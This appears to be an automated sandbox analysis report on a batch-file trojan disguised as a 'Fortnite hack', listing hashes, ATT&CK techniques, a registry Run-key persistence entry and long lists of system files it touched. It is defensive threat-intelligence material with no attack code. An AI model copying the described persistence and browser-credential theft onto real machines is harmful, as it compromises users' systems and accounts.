d5395f121277d2b38f4173c7df0a20a3de99edfcfe2aa697080cc81170eb76ab

Resubmissions

09/03/2025, 01:58

250309-cdv29swybs 10

08/03/2025, 06:55

250308-hp35xatjt9 10

08/03/2025, 04:53

250308-fh1ebssky5 10

Analysis

max time kernel
300s
max time network
117s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
09/03/2025, 01:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

My-Skidded-malwares-main/Trojan.Bat.FortniteHackz.bat
Size

34KB
MD5

ac04b6f6fa293c4b55c4c8b49372a9ec
SHA1

9dfca519218c3c10203163454f1237916b0655cc
SHA256

273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92
SHA512

b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086
SSDEEP

192:9TIqVppLuLpDq7QYfLGMV+jasHHLgLxLR44444444444444444M666666666666Q:9rVppLuLpDq7QYfLGMV+jasHHLgLxi

Score

8^/10

persistence spyware stealer

Malware Config

Signatures

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\gmreadme.txt	cmd.exe
File created	C:\Windows\System32\drivers\gmreadme.txt	cmd.exe
File opened for modification	C:\Windows\SysWOW64\drivers\gmreadme.txt	cmd.exe
File created	C:\Windows\SysWOW64\drivers\gmreadme.txt	cmd.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_7188_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\My-Skidded-malwares-main\\Trojan.Bat.FortniteHackz.bat"	reg.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\IME\IMEJP\APPLETS\IMJPCLST.XML	cmd.exe
File opened for modification	C:\Windows\System32\spool\tools\Microsoft Print To PDF\MPDW-pipelineconfig.xml	cmd.exe
File created	C:\Windows\System32\ByteCodeGenerator.exe	cmd.exe
File opened for modification	C:\Windows\System32\SettingSyncHost.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\wbem\WMIC.exe	cmd.exe
File created	C:\Windows\System32\Speech_OneCore\common\es-ES\tokens_TTS_es-ES.xml	cmd.exe
File opened for modification	C:\Windows\System32\EaseOfAccessDialog.exe	cmd.exe
File created	C:\Windows\System32\fsutil.exe	cmd.exe
File opened for modification	C:\Windows\System32\tpmvscmgrsvr.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\fontview.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\WinRTNetMUAHostServer.exe	cmd.exe
File opened for modification	C:\Windows\System32\Recovery\ReAgent.xml	cmd.exe
File opened for modification	C:\Windows\System32\chglogon.exe	cmd.exe
File created	C:\Windows\System32\fontview.exe	cmd.exe
File created	C:\Windows\System32\RdpSa.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\iscsicli.exe	cmd.exe
File created	C:\Windows\SysWOW64\perfmon.exe	cmd.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnms014.inf_amd64_faec3fc366f8e1fa\Amd64\MSMPS.xml	cmd.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnms007.inf_amd64_8bbf44975c626ac5\Amd64\MSPassthrough-pipelineconfig.xml	cmd.exe
File created	C:\Windows\SysWOW64\MailContactsCalendarSync\LiveDomainList.txt	cmd.exe
File created	C:\Windows\SysWOW64\SyncHost.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\SystemPropertiesProtection.exe	cmd.exe
File opened for modification	C:\Windows\System32\ByteCodeGenerator.exe	cmd.exe
File created	C:\Windows\System32\iscsicpl.exe	cmd.exe
File created	C:\Windows\System32\rekeywiz.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\bthudtask.exe	cmd.exe
File created	C:\Windows\SysWOW64\cipher.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\dccw.exe	cmd.exe
File created	C:\Windows\SysWOW64\setup16.exe	cmd.exe
File opened for modification	C:\Windows\System32\@VpnToastIcon.png	cmd.exe
File created	C:\Windows\System32\WindowsUpdateElevatedInstaller.exe	cmd.exe
File opened for modification	C:\Windows\System32\RemoteSystemToastIcon.png	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_a7412a554c9bc1fd\MPDW_devmode_map.xml	cmd.exe
File opened for modification	C:\Windows\SysWOW64\F12\Timeline.cpu.xml	cmd.exe
File created	C:\Windows\SysWOW64\Speech_OneCore\Common\de-DE\Tokens_SR_de-DE-N.xml	cmd.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnms004.inf_amd64_c28ee88ec1bd4178\Amd64\unisharev4-pipelineconfig.xml	cmd.exe
File created	C:\Windows\System32\appidpolicyconverter.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\mmgaserver.exe	cmd.exe
File created	C:\Windows\SysWOW64\Netplwiz.exe	cmd.exe
File created	C:\Windows\System32\SecurityAndMaintenance_Alert.png	cmd.exe
File created	C:\Windows\System32\Speech_OneCore\common\es-ES\tokens_TTS_es-ES_helena.xml	cmd.exe
File created	C:\Windows\SysWOW64\icsxml\potscfg.xml	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms011.inf_amd64_f83138380f5fb6ab\Amd64\MSAppMon-pipelineconfig.xml	cmd.exe
File created	C:\Windows\System32\cmdkey.exe	cmd.exe
File created	C:\Windows\System32\dllhost.exe	cmd.exe
File opened for modification	C:\Windows\System32\pnputil.exe	cmd.exe
File created	C:\Windows\System32\PresentationSettings.exe	cmd.exe
File created	C:\Windows\System32\tskill.exe	cmd.exe
File opened for modification	C:\Windows\System32\TSWbPrxy.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\help.exe	cmd.exe
File created	C:\Windows\SysWOW64\icsxml\pppcfg.xml	cmd.exe
File opened for modification	C:\Windows\System32\credwiz.exe	cmd.exe
File opened for modification	C:\Windows\System32\NetHost.exe	cmd.exe
File created	C:\Windows\System32\PinEnrollmentBroker.exe	cmd.exe
File opened for modification	C:\Windows\System32\pospaymentsworker.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\hdwwiz.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\timeout.exe	cmd.exe
File opened for modification	C:\Windows\System32\NdfEventView.xml	cmd.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_0e2452f597790e95\Amd64\unishare-pipelineconfig.xml	cmd.exe
File opened for modification	C:\Windows\System32\finger.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\@VpnToastIcon.png	cmd.exe
File created	C:\Windows\System32\DriverStore\FileRepository\prnms012.inf_amd64_707d3849370b9d23\Amd64\MSIPP.xml	cmd.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\default.help.txt	cmd.exe
File created	C:\Windows\System32\certreq.exe	cmd.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreMedTile.scale-100.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageSplashScreen.scale-100_contrast-white.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-32_contrast-white.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-60_altform-unplated_contrast-black.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Videos\SmartSelect\Magic_Select_add_tool.mp4	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-72.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\node_modules\reactxp-experimental-navigation\NavigationExperimental\assets\[email protected]	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\offer_cards\subs-illustration.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-40_altform-unplated_contrast-black.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-40.png	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\WideTile.scale-100.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-48_altform-unplated.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SplashScreen.scale-200.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SmallTile.scale-150_contrast-white.png	cmd.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSplashLogo.scale-150.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderStoreLogo.contrast-black_scale-100.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\WideLogo.scale-100_contrast-black.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\CortanaApp.ProjectedApi.xml	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageWideTile.scale-100.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-24_altform-unplated.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-60_altform-unplated_contrast-black.png	cmd.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxLargeTile.scale-150.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailSmallTile.scale-150.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\sq-AL\View3d\3DViewerProductDescription-universal.xml	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\Bibliography\BIBFORM.XML	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteAppList.scale-400.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-64.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\WideTile.scale-200_contrast-white.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\AppxManifest.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageWideTile.scale-200.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchStoreLogo.scale-200_contrast-white.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-white\MedTile.scale-100.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\Icons_Icon_PoP_sm.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-48_altform-unplated_contrast-black.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-40_contrast-black.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\CalculatorWideTile.contrast-white_scale-100.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-black\MedTile.scale-200.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-16_altform-lightunplated.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MusicStoreLogo.scale-200_contrast-black.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-64_altform-unplated.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorStoreLogo.contrast-black_scale-200.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_2019.904.1644.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\MedTile.scale-400.png	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-30_altform-unplated.png	cmd.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailWideTile.scale-200.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-80.png	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelFluent.White.png	cmd.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptySearch.scale-150.png	cmd.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\empty.png	cmd.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarBadge.scale-100.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\SmallTile.scale-200.png	cmd.exe
File created	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\symbase.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml	cmd.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-20.png	cmd.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-40.png	cmd.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL002.XML	cmd.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\ConnectionManager.xml	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-36.png	cmd.exe
File created	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml	cmd.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPSquare44x44Logo.targetsize-64_altform-unplated_contrast-white.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1_none_97b0a47239f6db64\PeopleLogo.scale-400_contrast-white.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.19041.1_it-it_f8576122041e54e0\Report.System.Diagnostics.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoftwindows-un..keddevkit.appxsetup_31bf3856ad364e35_10.0.19041.1_none_0ae9d97ab43d0e4a\AppxBlockMap.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\splwow64.exe	cmd.exe
File created	C:\Windows\IME\IMEJP\Assets\JpnImeModeToast.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-d..scannerpreview-host_31bf3856ad364e35_10.0.19041.1_none_484e61e96e69ac70\StoreLogo.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-i..lineid-wamextension_31bf3856ad364e35_10.0.19041.1151_none_74dbc950b4727647\DefaultAccountTile.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.1266_none_fb76f6fb7e78a373\ScreenClipping\ScreenClipping\Assets\StoreLogo.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-tabletpc-softkeyboard_31bf3856ad364e35_10.0.19041.173_none_af877ec0b0472fde\symbase.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-editions-professional_31bf3856ad364e35_10.0.19041.264_none_ba5e4a287945a683\UpgradeMatrix.xml	cmd.exe
File created	C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\header\Images\badgeRunning.png	cmd.exe
File opened for modification	C:\Windows\SystemApps\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\speech\080a\tokens_esMX.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-dot3svc.resources_31bf3856ad364e35_10.0.19041.1_de-de_1418e1a4e830cf09\Rules.System.NetDiagFramework.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-b..ment-windows-minwin_31bf3856ad364e35_10.0.19041.1266_none_c4b179e0b12fe4b9\f\winload.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-disksnapshot_31bf3856ad364e35_10.0.19041.1_none_3640cf5b039ce2f0\DiskSnapshot.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-u..userpredictionmodel_31bf3856ad364e35_10.0.19041.1_none_42c9bed4b6bd2e16\17499b8d805e9480903b0df0326a3d231841049e.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_openssh-common-components-onecore_31bf3856ad364e35_10.0.19041.964_none_9a882af90ea09cc3\ssh-agent.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.19041.546_none_476476bb5c3a0bbc\PPIRemovableStorageDevicesSquareTile44x44.scale-400.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.1_none_75cd350cc8b5dbcf\filepicker.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-t..honyinteractiveuser_31bf3856ad364e35_10.0.19041.906_none_a6600355b5f69459\TextReply.scale-200.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-ui-shellcommon-core_31bf3856ad364e35_10.0.19041.1_none_91b1f58702057373\CellularToast.scale-125_contrast-white.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-p..rastructureconsumer_31bf3856ad364e35_10.0.19041.1_none_69cd9c22cfcf9358\Report.System.Performance.xml	cmd.exe
File created	C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPSquare44x44Logo.targetsize-32.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-dot3svc.resources_31bf3856ad364e35_10.0.19041.1_de-de_1418e1a4e830cf09\Rules.System.Wired.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-editions-professional_31bf3856ad364e35_10.0.19041.264_none_ba5e4a287945a683\UpgradeMatrix.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.1266_none_fb76f6fb7e78a373\ScreenClipping\Assets\Square44x44Logo.targetsize-24_altform-unplated.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..iondialog.appxsetup_31bf3856ad364e35_10.0.19041.1023_none_5f1081b1c1cd1c92\f\AppxBlockMap.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-printing-printtopdf_31bf3856ad364e35_10.0.19041.1_none_382102bfe5e97ed1\MPDW_devmode_map.xml	cmd.exe
File created	C:\Windows\WinSxS\x86_wpf-winfxlist_31bf3856ad364e35_10.0.19041.1_none_9aaf4564d7092a18\WinFXList.xml	cmd.exe
File created	C:\Windows\SystemResources\Windows.UI.ShellCommon\Images\WiFiNetworkManagerToast.scale-400_contrast-black.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-s..okerplugin.appxmain_31bf3856ad364e35_10.0.19041.1202_none_d081f9868ac0a804\PasswordExpiry.contrast-white_scale-200.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoftwindows-un..keddevkit.appxsetup_31bf3856ad364e35_10.0.19041.1023_none_c9d08284ca03f3d7\f\AppxBlockMap.xml	cmd.exe
File created	C:\Windows\WinSxS\Backup\amd64_windows-defender-service_31bf3856ad364e35_10.0.19041.746_none_a39f6d9ab59bd8b7_thirdpartynotices.txt_086f3c50	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-msconfig-exe_31bf3856ad364e35_10.0.19041.1110_none_4f46693352ed3250\msconfig.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1_none_bf506ecc66a800df\poqexec.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\Square44x44Logo.scale-100.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\PeopleLogo.targetsize-16_altform-unplated_contrast-black.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-editions-professional_31bf3856ad364e35_10.0.19041.1288_none_51444fcfcf940a66\ProfessionalWorkstationEdition.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-f..ysafety-refreshtask_31bf3856ad364e35_10.0.19041.1266_none_d375b5361b806b32\WpcTok.exe	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.1_none_d0af17ec366548f3\TinyTile.scale-125.png	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-s..s-datausagehandlers_31bf3856ad364e35_10.0.19041.153_none_dbdeec75cdd2a4d1\DataUsageLiveTileTask.exe	cmd.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AppxBlockMap.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.19041.1_de-de_c2bbc1ff4b155b96\Report.System.Summary.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-audio-audiocore_31bf3856ad364e35_10.0.19041.1266_none_eb6597ac99d11603\f\audiodg.exe	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-shell-previewhost_31bf3856ad364e35_10.0.19041.1_none_f92e72a6a03c2c5a\prevhost.exe	cmd.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-t..peech-de-de-onecore_31bf3856ad364e35_10.0.19041.1_none_9703b402e16fe292\tokens_TTS_de-DE_hedda.xml	cmd.exe
File created	C:\Windows\Provisioning\IccidToRegion.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-s..iencehost.appxsetup_31bf3856ad364e35_10.0.19041.1023_none_52fbb1b86a870614\f\AppxManifest.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-tabletpc-softkeyboard_31bf3856ad364e35_10.0.19041.746_none_afaafac6b02c16fa\ja-jp-sym.xml	cmd.exe
File created	C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\serviceworkericon.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-a..gement-uevtemplates_31bf3856ad364e35_10.0.19041.1_none_0d66b54875835a49\MicrosoftInternetExplorer2013Backup.xml	cmd.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Assets\Square71x71Logo.scale-150.png	cmd.exe
File created	C:\Windows\WinSxS\wow64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.19041.153_none_f3a9dc0fe254a157\DMR_48.png	cmd.exe
File created	C:\Windows\servicing\Sessions\31162705_200277395.back.xml	cmd.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\images\AccountLogo.png	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..kerplugin.appxsetup_31bf3856ad364e35_10.0.19041.1023_none_23f4c1602d97fe43\r\AppxBlockMap.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-t..nputpersonalization_31bf3856ad364e35_10.0.19041.746_none_1da55dc225237a0d\ipsdan.xml	cmd.exe
File opened for modification	C:\Windows\WinSxS\amd64_microsoft-windows-s..mpropertieshardware_31bf3856ad364e35_10.0.19041.1_none_f6eb92c37257e103\SystemPropertiesHardware.exe	cmd.exe
